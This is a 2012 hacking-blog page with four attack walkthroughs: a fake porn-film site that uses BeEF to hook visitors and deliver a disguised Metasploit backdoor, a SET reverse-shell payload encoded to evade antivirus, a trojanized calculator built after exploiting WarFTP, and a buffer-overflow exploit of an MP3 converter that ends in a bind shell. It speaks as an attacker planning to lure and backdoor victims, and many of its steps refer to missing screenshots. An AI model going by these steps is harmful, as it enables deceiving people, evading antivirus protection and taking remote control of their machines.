Showing posts with label Remote. Show all posts
Showing posts with label Remote. Show all posts

Friday, March 9, 2012

FAKE FILM ARTIS INDONESIA Feat BEEF AND METASPLOIT

This containts is fiction aimed at learning

The Scenario :
  1. Attacker with social enginnering technique using social network, chatting or mail to victim send the url or link the web page contains beef and metasploit. 
  2. Victim open the url of web page and download the metasploit file.
  3. Attacker get connection via opened beef page (url web page) and get backdoor using metasploit
Lets make the hook beef home page...fake web application about porn film. Look the script carefully!.


the script
 How with the display? 
The Fake Web Infected Beef and Metasploit contains
Lets make the payload with the name tyas.avi


Making The Payload
The result ....
The Sexy payload Found
The hooks file ...
Hooks file
Lets to "SOCENG" social engineering technique, send the information about this artist porn film to social network, micro blogging, SEO, email, chatting, sms...etc. 
Next open the BEEF in the attacker..

Beef Log in
 Wait the victim to open the page...and ..ok, the victim open the beef page, so look your beef.


Connected with victim.
Next, victim will download the film...."what is in the victims mind? its a fake file" ...



Victim Download the file
What next .... ?
To be continued......
Posted by Night Fury at 9:08 PM Labels: , , , , , 0 comments

REMOTE CONNECTION USING SOCIAL ENGINEERING ATTACK

Social Engineering Attack 
Is an attack technique by way of manipulation of the target can be informative to follow what he wanted to get the information and data. for example by making use of social networking or email that is sent to the target. it is intended to target url open a link or web page, known as phishing techniques. In this phase tried with social engineering and social engineering toolkit. 

Social Engineering Toolkit
 
SET
Making the payload and set the Ip address attacker

Making Payload and listener
Menu payload, and i choose meterpreter reverse tcp

Menu
Choose the encoder to bypass the AV Anti Virus, in this session select shikata ga nai and set the port listener..
Encoding 
Iteration
 Open the msfconsole, use the multi hendler and set the LHOST, LPORT and run 

Multi hendler msfconsole
Multi Hendler
With social engineering techniques so that the victim will execute the file. And look the payload in the victim machine (windows). in this scenario the victim download file msf via websites and save into My Documents.
Payload file victim target
The victim execute the payload file...so look the metasploit meterpreter..

Connected
The target connected, we can remote download or upload..its nice backdoor
Posted by Night Fury at 8:16 PM Labels: , , , , 0 comments

Using msfpayload And msfencode To Bypass AV (Antivirus)

Crafted fake calculator file

The keys is: msfpayload ... | msfencode ...
  
Tools :
Attacker (Backtrack 5 R1 Customize, Metasploit)
Victim (Windows XP SP3, WarFtp, Calculator)
Scenario
The victims running the WarFtp Application on the machine so by the application running on the victims target the attacker find the way to exploit the Ftp applications.
  1. Attacker exploit warftp application in the victim machine---> Meterpreter -----> download calc.exe from the victim machines to rebuild the fake of calculator. Fake calculator is the application result from generate payload and encoding.
  2. Syntaks msfpayload Lhost= ...... Lport=.......windows/...| msfencode -x /home/calc -o
  3. The result after generate payloads and encoding is evil executable application
  4. Sometimes with the 21 iteration can make the evil application bypassing the 42 antivirus with the latest update.
  5. After Encoding you must upload the evill application to the victim machines.
  6. The victim run the evill application (fake calculator) so the connection attacker and victims establish.
Lets try...first time open the msfconsole and search the exploit module for warftp.
Search exploit
And then choose one of the exploit
Using exploit
Set the payload
Set the Payload
You can use show option to know the information and option to be setting up. the default port is 4444 and RHOST the ip target. And show the target.

show target
and then set the target and exploit now

Set target
Victim's machine
Victims
If your exploitation succes, you get meterpreter to download and upload the file what you need, in this stage i choose calculator. Download calculator from victim with meterpreter to rebuild the calculator with paylaod and encoder to bypass the AV (Antivirus).

download calc.exe
Calculator in the victim
After download
Lets to rebuild fake calculator using msfpayload and msfencode, you must be entrance the value of iteration, the iteration is one of the function msfencode.

Crafted File
And then upload to the victim target and exit your metasploit

Upload File
After Upload on the Victim
Lets search and use multi hendler, show the options and set up the LPORT and RHOST...the step by step like the picture.


Waiting the target
The meterpreter waiting the victim to execute the calcuator.

EvillCalculator  
The victim runing the evil calculator (Fake Calculator)..
Lets see the nc
NC 
The Connections establish





Posted by Night Fury at 7:05 AM Labels: , , , 0 comments

Monday, February 20, 2012

FUZZING: DIRECT RETURN MP3-CONVERTER BUFFER OVERFLOW (BASED EXPLOIT)

REMOTE THE WINDOWS USING EXPLOIT and BUFFER OVER FLOW

This time it tries to do fuzzing to mp3 converter (rm-m3u) that runs on Microsoft Windows XP (victim). Previously been discussed and tested in war-ftp application. Techniques used in buffer overflow is equivalent to the direct return of the previous techniques based exploitation, the difference here will try to make the fuzzer itself does not use a fuzzer that already exist in the exploit-db.

mp3 converter
Rm-mp3 converter on Windows
 Tools :
Victim : Microsoft Windows XP, RM-MP3 Converter, OllyDbg.
Attacker : Bactrack

Ok, we try to make a simple fuzzer. The purpose of making a simple fuzzer without using the exploit-db is to try yourself to understand about fuzzing techniques in a buffer overflow. The following is the result of a simple fuzzer but have not been able to make the overflow on the ESP.
Fuzzer1
Crash
Seen that the fuzzer can not overwrite the ESP. therefore we try to increase fuzzer size. In the sessions i used size 19000. And try to running the fuzzer like this python (fuzzername).py ......Lets see my fuzzer and after fuzzer run. 
ESP OverFlow
Then looking at the bytes where the register is overflow by using pattern_create. by using pattern create  to find out the location of a string in the data packets sent by the fuzzer.
pattern_create
Pattern_create output
 Look, the pattern_create output in the picture above, next we use it and fill into fuzzer. Lets edit the fuzzer like this.
Fuzzer2
So we run again the fuzzer, and look at the rm-mpe converter in the victim. The register ESP overwrite with the pattern and we know the value of EIP. If ESP overwrite and showing the value of EIP. We can find the byte.

EIP number
By using pattern_offset to calculate the byte size of the resulting pattern of olleh pattern_create.
Pattern_offset output
 Lets see the picture above, we know where the byte now, (17417-17425). So after this we edit the fuzzer again like this. By editing a fuzzer in order to conduct experiments to write DEADBEEF the EIP. If it works means that EIP has been undercontroll.
Fuzzer3
After running the fuzzer.
EIP Undercontroll
Next, edit the fuzzer agains with fill the offset value and the nop (no operation) in the fuzzer. Nop is a waste to write ASCII file into the C stack, but will not affect the execution
Fuzzer finall
Running the fuzzer again and lets see in the stack.
Stack with Nop
Next, see the executable modules, usually people choose SHELL32.dll or USER32.dll and i choose the SHELL32.dll to exploited. To open the executable modules with view-executable modules. Double klick and search for JMP ESP.
Executable Modules
Search JMP ESP....
JMP ESP
JMP ESP
Lets change the DEADBEEF in the fuzzer with value from JMP ESP (7C9D30D7). and run the fuzzer.
Fuzzer JMP ESP
The output memory in the stack and memory instruction full with ASCII CCCCC and CC.
Stack and Memory Instructions
After this, breakpoint in the memory instructions by F2 or right click and than break point---> momory on access like this. 
Memory Breakpoint
Open the metasploit to get the payload. Start msf web services : 
Msfweb service running
Lets open the browser. (127.0.0.1:55555), Filter the module and choose the payload. Because i will remote the victim i choose the Bind Shell,.
Find Payload
Fill in the payload
The payload
Ok. we find the payload and than fill the payload into the fuzzer...edit the fuzzer again :) and run it. Lets see the goal. by running telnet in the konsole (attacker Backtrack 5 R1). We are succesfully to remote the victim.
Fuzzer with payload
Telnet
Lets make a directory on the victim's drive.
Make a directory
The directory on the victim
So HOT .... :)






Posted by Night Fury at 2:35 AM Labels: , , , 0 comments
Subscribe to: Posts (Atom)